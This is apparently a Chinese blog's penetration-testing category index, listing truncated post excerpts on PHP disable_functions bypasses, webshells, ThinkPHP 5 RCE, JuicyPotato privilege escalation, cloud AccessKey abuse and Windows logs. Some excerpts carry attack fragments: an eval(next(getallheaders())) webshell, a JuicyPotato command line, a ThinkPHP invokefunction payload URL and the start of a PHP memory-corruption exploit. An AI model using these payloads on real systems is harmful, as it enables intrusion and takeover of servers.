随笔分类 -  渗透测试

各种渗透经验
摘要:0x01 open_basedir open_basedir是php.ini中的一个配置选项,可用于将用户访问文件的活动范围限制在指定的区域。 假设open_basedir=/var/www/html/web1/:/tmp/,那么通过web1访问服务器的用户就无法获取服务器上除了/var/www/h 阅读全文
posted @ 2020-05-07 22:20 Hookjoy 阅读(2163) 评论(0) 推荐(0) 编辑
摘要:一本黑, 一本黑 • 2020年4月12日 pm4:32 • 渗透测试 • 阅读 382 内容不太适合以公开的形式发布, 做项目时候发现AWS与某云OSS的AccessKey,然后去某云官网看文档发现很多有意思的东西。 文章整体结构: 渗透场景 云术语了解 创建一个OSS 访问控制了解 Access 阅读全文
posted @ 2020-04-24 01:04 Hookjoy 阅读(3847) 评论(0) 推荐(0) 编辑
摘要:<?php $cmd = "id"; $n_alloc = 10; # increase this value if you get segfaults class MySplFixedArray extends SplFixedArray { public static $leak; } clas 阅读全文
posted @ 2020-04-01 18:32 Hookjoy 阅读(473) 评论(0) 推荐(0) 编辑
摘要:用法"C:\ProgramData\JuicyPotato.exe" -t * -l 1337 -c {0A886F29-465A-4aea-8B8E-BE926BFAE83E} -p whoami 2008R2系统SYSTEM权限的CLSID: Copy to clipboard {03ca98d 阅读全文
posted @ 2020-03-11 01:56 Hookjoy 阅读(3319) 评论(0) 推荐(0) 编辑
摘要:环境函数用法 nginx get_defined_vars() 返回由所有已定义变量所组成的数组 apache getallheaders() 获取全部 HTTP 请求头信息 apache环境 1 2 3 <?php eval(next(getallheaders())); ?> 1 2 3 <?p 阅读全文
posted @ 2019-12-30 02:03 Hookjoy 阅读(511) 评论(0) 推荐(0) 编辑
摘要:= 0; $j--) { $address >= 8; } return $out; } function write(&$str, $p, $v, $n = 8) { $i = 0; for($i = 0; $i >= 8; } } function le... 阅读全文
posted @ 2019-12-16 10:29 Hookjoy 阅读(574) 评论(0) 推荐(0) 编辑
只有注册用户登录后才能阅读该文。
posted @ 2019-11-29 22:11 Hookjoy 阅读(9) 评论(0) 推荐(0) 编辑
摘要:#这个文章我之前在t00ls已经分享过了 #内容只是对tp5的实战环境下getshell做的记录,中间遇到的一些小问题的突破,没啥技术含量 -5.1.18 http://www.xxxxx.com/?s=admin/\think\app/invokefunction&function=call_us 阅读全文
posted @ 2019-11-03 11:47 Hookjoy 阅读(1496) 评论(0) 推荐(0) 编辑
摘要:array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w")); $cwd = getcwd(); $msg = php_uname()."\n------------Code by Spider-------------\n"; if($os == 'WIN') { $env = array('path' => 'c:... 阅读全文
posted @ 2019-07-16 12:02 Hookjoy 阅读(496) 评论(0) 推荐(0) 编辑
只有注册用户登录后才能阅读该文。
posted @ 2019-07-09 13:08 Hookjoy 阅读(10) 评论(0) 推荐(0) 编辑
摘要:windows操作系统事件日志 C:\Windows\System32\winevt\Logs\ *( XP C:\Windows\System32) 应用程序日志 App Event.Evtx(Application.evtx) 安全日志 SecEvent.Evtx 系统日志 SysEvent.E 阅读全文
posted @ 2019-07-01 22:32 Hookjoy 阅读(2577) 评论(0) 推荐(0) 编辑
摘要:McAfeeFramework|McShield|McTaskManager|mfevtp|NIS|Updatesrv|VSSERV|iGateway|InoRPC|InoRT|InoTask|ccEvtMgr|ccSetMgr|DefWatch|SPBBCSvc|Symantec AntiViru 阅读全文
posted @ 2019-05-21 12:32 Hookjoy 阅读(4159) 评论(0) 推荐(1) 编辑
摘要:原文:https://www.anquanke.com/post/id/85925 作者:三思之旅 预估稿费:300RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 在Web渗透测试过程中,BurpSuite是不可或缺的神器之一。BurpSuite的核心是代理Proxy, 阅读全文
posted @ 2019-04-23 22:40 Hookjoy 阅读(29794) 评论(0) 推荐(5) 编辑
摘要:作者:三思之旅 预估稿费:300RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 在Web渗透测试过程中,BurpSuite是不可或缺的神器之一。BurpSuite的核心是代理Proxy,通常情况下使用BurpSuite的套路是:浏览器设置BurpSuite代理——>访问 阅读全文
posted @ 2018-12-28 21:58 Hookjoy 阅读(1792) 评论(0) 推荐(1) 编辑
摘要:*本文原创作者:yangyangwithgnu,本文属FreeBuf原创奖励计划,未经许可禁止转载 摘要:千辛万苦拿到的 webshell 居然无法执行系统命令,怀疑服务端 disable_functions 禁用了命令执行函数,通过环境变量 LD_PRELOAD 劫持系统函数,却又发现目标根本没安 阅读全文
posted @ 2018-12-24 10:38 Hookjoy 阅读(1304) 评论(0) 推荐(0) 编辑
摘要:一、漏洞摘要 漏洞名称: DedeCMS V5.7 SP2前台文件上传漏洞上报日期: 2018-12-11漏洞发现者: 陈灿华产品首页: http://www.dedecms.com/软件链接: http://updatenew.dedecms.com/base-v57/package/DedeCM 阅读全文
posted @ 2018-12-20 10:32 Hookjoy 阅读(5066) 评论(0) 推荐(1) 编辑
摘要:环境描述: mysql版本:5.5.57-log 操作系统版本:Red Hat Enterprise Linux Server release 6.6 (Santiago) 需求描述: 在mysql的使用过程中,有的时候登录到了mysql数据库中,同时需要执行一些操作系统的命令 比如,在mysql中 阅读全文
posted @ 2018-12-15 11:40 Hookjoy 阅读(1131) 评论(0) 推荐(0) 编辑
摘要:0×01 前言 因为今天的重点并非nmap本身的使用,主要还是想借这次机会给大家介绍一些在实战中相对比较实用的nmap脚本,所以关于nmap自身的一些基础选项就不多说了,详情可参考博客端口渗透相关文章,废话少说,咱们直接开始,实际中我们可以先用下面的语句,大概扫一眼目标机器或目标C段都跑了什么服务, 阅读全文
posted @ 2018-08-20 21:44 Hookjoy 阅读(1358) 评论(0) 推荐(0) 编辑
摘要:直显: 导出: 阅读全文
posted @ 2018-08-19 11:29 Hookjoy 阅读(1031) 评论(0) 推荐(0) 编辑
只有注册用户登录后才能阅读该文。
posted @ 2018-07-28 00:17 Hookjoy 阅读(56) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示